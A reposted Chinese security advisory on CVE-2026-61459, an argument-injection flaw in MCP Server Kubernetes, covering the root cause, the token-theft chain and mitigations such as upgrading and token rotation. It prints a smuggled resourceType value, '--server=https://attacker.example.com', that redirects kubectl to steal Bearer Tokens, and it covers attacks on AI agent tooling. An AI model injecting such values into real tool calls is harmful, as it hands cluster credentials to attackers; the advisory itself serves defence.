文章总结: MCPServerKubernetes存在高危参数注入漏洞CVE-2026-61459,影响3.9.0以下版本。攻击者可通过构造带前导短横线的参数绕过安全检查,注入–server参数窃取BearerToken,导致集群完全沦陷。官方已发布3.9.0修复版本,建议立即升级并轮换Token。 综合评分: 88 文章分类: 漏洞分析,红队,安全工具
紧急安全预警|MCP Server Kubernetes 爆出高危参数注入漏洞(CVE-2026-61459),可导致 Kubernetes 集群完全沦陷
原创
tuto tuto
杂杂咱谈
2026年7月12日 09:59 福建
在小说阅读器读本章
去阅读
漏洞概况
研究人员披露 MCP Server Kubernetes 存在一项高危参数注入漏洞(CVE-2026-61459),影响 3.9.0 之前所有版本。
漏洞存在于 MCP Server Kubernetes 的 kubectl_get、kubectl_describe 以及 kubectl_delete 等结构化工具中。由于参数校验逻辑存在缺陷,攻击者可通过构造带有前导短横线(-)的参数绕过安全检查,并向底层 kubectl 命令注入任意参数。
其中最危险的利用方式是注入 --server 参数,将 kubectl 请求重定向至攻击者控制的 Kubernetes API Server,诱导客户端自动发送 Bearer Token,最终导致 Kubernetes 集群完全失陷。
漏洞 CVSS 评分高达 9.8 (Critical),官方已在 3.9.0 版本完成修复。
漏洞时间线
| 时间 | 事件 | | — | — | | 2026-07-10 | 漏洞公开披露 (CVE-2026-61459) | | 同日 | 官方发布修复版本 3.9.0 | | 当前 | 建议所有用户立即升级 |
受影响产品
| 项目 | 内容 | | — | — | | 产品 | MCP Server Kubernetes | | 漏洞编号 | CVE-2026-61459 | | 漏洞类型 | 参数注入 (Argument Injection) | | CWE | CWE-88 | | CVSS | 9.8 (Critical) | | 利用条件 | 无需身份认证 | | 修复版本 | 3.9.0 |
受影响版本
| 产品 | 受影响版本 | 修复版本 | | — | — | — | | MCP Server Kubernetes | < 3.9.0 | 3.9.0 |
漏洞分析
什么是 MCP Server Kubernetes?
MCP Server Kubernetes 是 Model Context Protocol 生态中的 Kubernetes 服务组件。
它能够为 AI Agent 提供 Kubernetes 集群上下文,并代表 AI 调用:
- kubectl get
- kubectl describe
- kubectl delete
- port-forward
等 Kubernetes 管理命令,使 AI 能够直接管理 Kubernetes 集群。
随着 AI Agent 平台的发展,MCP Server Kubernetes 已成为许多智能运维(AIOps) 和 Agent 工作流的重要组成部分。
漏洞根因
参数校验存在缺陷
漏洞源于安全检查函数:
assertNoDangerousFlags()
该函数原本用于阻止危险参数传递给 kubectl。
然而,当攻击者构造以下参数时:
resourceType:
--server=https://attacker.example.com
由于参数以前导 “-“ 开头,安全检查未能正确识别。
最终导致:
用户输入
↓
MCP Server
↓
assertNoDangerousFlags()
↓
检查绕过
↓
kubectl
攻击者成功向 kubectl 注入:–server 参数。
漏洞利用链
漏洞利用流程
整个攻击链如下:
攻击者发现运行 <3.9.0 的 MCP Server
↓
构造恶意请求
resourceType:
--server=https://attacker.example.com
↓
绕过 assertNoDangerousFlags()
↓
kubectl 被重定向到攻击者 API Server
↓
Authorization:
Bearer Token 自动发送
↓
攻击者获取 Kubernetes Bearer Token
↓
登录真实 Kubernetes API
↓
完全控制整个集群
为什么能够窃取 Token?
kubectl 在访问 Kubernetes API Server 时,会自动携带:
Authorization:
Bearer <TOKEN>
当攻击者将:–server 修改为自己的服务器后,kubectl 会主动连接攻击者服务器,
并自动发送:
Kubernetes Bearer Token
攻击者即可利用该 Token 登录真实 Kubernetes API。
第二条攻击路径
研究人员进一步发现:
除了 CVE 中公开的:
- kubectl_get
- kubectl_describe
- kubectl_delete
之外,
port_forward 功能同样存在相同问题。
其内部同样会将用户输入直接传递给 kubectl,
因此也可注入:–server 实现 Bearer Token 窃取。
官方在 3.9.0 中已同时修复该问题。
漏洞影响
成功利用后,攻击者可直接获得 Kubernetes 集群控制权限。
Bearer Token 窃取
攻击者可:
- 窃取 Operator Bearer Token
- 获取 Kubernetes API 访问权限
Kubernetes 集群接管
利用窃取的 Token,可进一步:
- 创建 Pod
- 删除资源
- 修改 Deployment
- 控制整个 Kubernetes 集群
敏感数据泄露
攻击者可读取:
- Kubernetes Secrets
- ConfigMaps
- ServiceAccount
- Pod 配置
- 集群元数据
部署恶意工作负载
攻击者能够:
- 部署恶意容器
- 植入后门
- 挖矿程序
- 持久化控制
横向移动
利用 Kubernetes 权限,
攻击者还可能:
- 攻击内部微服务
- 访问数据库
- 横向渗透企业内网
对于运行 AI Agent 的 Kubernetes 环境而言,风险尤其严重。
官方修复情况
官方已在:
MCP Server Kubernetes 3.9.0
修复:
- kubectl_get
- kubectl_describe
- kubectl_delete
- port_forward
中的参数注入问题。
防护建议
1、立即升级
升级至:
npm install [email protected]
这是唯一完整修复方案。
2、限制 MCP 工具访问权限
在完成升级前,
建议仅允许可信用户访问:
- kubectl_get
- kubectl_describe
- kubectl_delete
- port_forward
避免未授权用户调用。
3、轮换 Kubernetes Bearer Token
如果服务器在升级前曾接收来自不可信来源的输入,应立即:
- 更换 ServiceAccount Bearer Token
- 吊销旧 Token
- 检查 API Server 审计日志
确认是否存在异常访问。
4、加强网络隔离
建议:
- 不要将 MCP Server 暴露至公网;
- 通过防火墙限制访问来源;
- 仅允许可信网络访问 MCP 服务。
5、遵循最小权限原则
为 MCP Server 使用的 ServiceAccount 配置最小权限 RBAC,避免赋予 cluster-admin 等高权限角色,降低漏洞被利用后的影响范围。
总结
CVE-2026-61459 是 MCP Server Kubernetes 中一项影响严重的参数注入漏洞。攻击者无需身份认证,仅需构造带有前导短横线的 resourceType 或相关参数,即可绕过 assertNoDangerousFlags() 安全检查,向底层 kubectl 注入 --server 参数,将请求重定向至恶意 Kubernetes API 服务,从而窃取 Operator 的 Bearer Token。
由于 MCP Server Kubernetes 通常部署于 AI Agent 或智能运维平台中,并拥有较高的 Kubernetes 集群权限,一旦 Token 泄露,攻击者即可完全控制 Kubernetes 集群、访问敏感资源并部署恶意工作负载。建议所有用户立即升级至 3.9.0,同时轮换 Bearer Token、限制 MCP 工具访问范围,并实施最小权限 RBAC,以有效降低攻击风险。
Simple #CVE-2026-61459 #MCP Server Kubernetes
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:杂杂咱谈 tuto tuto《紧急安全预警|MCP Server Kubernetes 爆出高危参数注入漏洞(CVE-2026-61459),可导致 Kubernetes 集群完全沦陷》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论